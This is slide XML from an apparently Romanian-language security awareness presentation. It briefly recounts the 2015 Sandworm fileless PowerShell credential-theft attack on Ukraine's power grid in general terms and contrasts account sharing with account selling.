              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ex. 1: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Fileless PowerShell</a:t>
            </a:r>
            <a:endParaRPr lang="en-RO" sz="3600" b="1">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DF3DD16-2C23-DFC4-A871-1CFC9940C00D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="8347328" cy="78009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200">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53446863-0D94-5F5F-56B8-518C1C8E3E3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248089" y="2463478"/>
            <a:ext cx="492732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1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Context: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2015, un actor statal (Sandworm team) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>atacă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rețeaua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elctrică</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> din </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ucraina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cu un script PowerShell care </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execută</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilitar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>furt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>credențiale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> direct din </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memorie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Zero malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>salvat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pe disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Zero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alerte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>soluția</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>securitate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mișcare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> lateral: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2058" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1D29140-741C-C038-50DD-D7DFA00F1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634" y="1091531"/>
            <a:ext cx="6925277" cy="473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0663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B6B497F-BAC2-9AB7-EDD6-982A560E1D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”Love is sharing a password”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture Placeholder 22" descr="A red letter n&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98195EDF-144C-CDD8-8772-94D33451E9F7}"/>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2530" b="2530"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E52027F-FEB1-EB2C-4F9B-9CCECB2EA228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> e de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>actualitate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>orice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>membru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>familiei</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> care nu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>locuiește</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adresa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> din contract e un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>utilizator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suplimentar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A90C1202-F673-43F5-E703-1780C42CC064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Picture Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B33EF48A-2FB2-EE72-DDA9-13E9B0414FBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93090253-9B26-D698-F4B1-CC4419EF4F81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73F0B237-9391-5F21-6DCF-91445ED4EC82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”Love is selling your password”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture Placeholder 24" descr="A blue circle with a white paper plane in the middle&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE18C9D9-5588-6447-39E4-9AED3B7EDC33}"/>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2530" b="2530"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AAFB941-2543-1474-7C3B-5349FCC45515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Super de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>actualitate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>orice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>doilea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cumpărător</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>primește</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 10% discount </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>garantat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> un alt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>schimb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dacă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> nu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>activ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>contul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>deja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cumpărat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC1341EB-4396-B1EA-A00E-630D14FA466C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Picture Placeholder 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7016EB9-A374-CBF6-DBA0-11820F0F4ACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58785FF0-32DA-10C9-0EA5-032D9057C79C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE4B08B4-BF2F-68ED-C10F-DA15D9D523AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Găsiți</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>diferențele</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{421CC3F1-6437-F20B-9FF6-A2471BE9A6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4197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FC4A91-B5E7-F299-C1F1-53087B25BE7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dacă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> am </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trăi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Black Mirror, care din </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>episoade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> fi Realitatea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>noastră</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74838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39D70CE-E33F-C35E-DE44-AA00F32F65D1}"/>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5C21FD19-26C7-E908-4703-BB446F101D31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
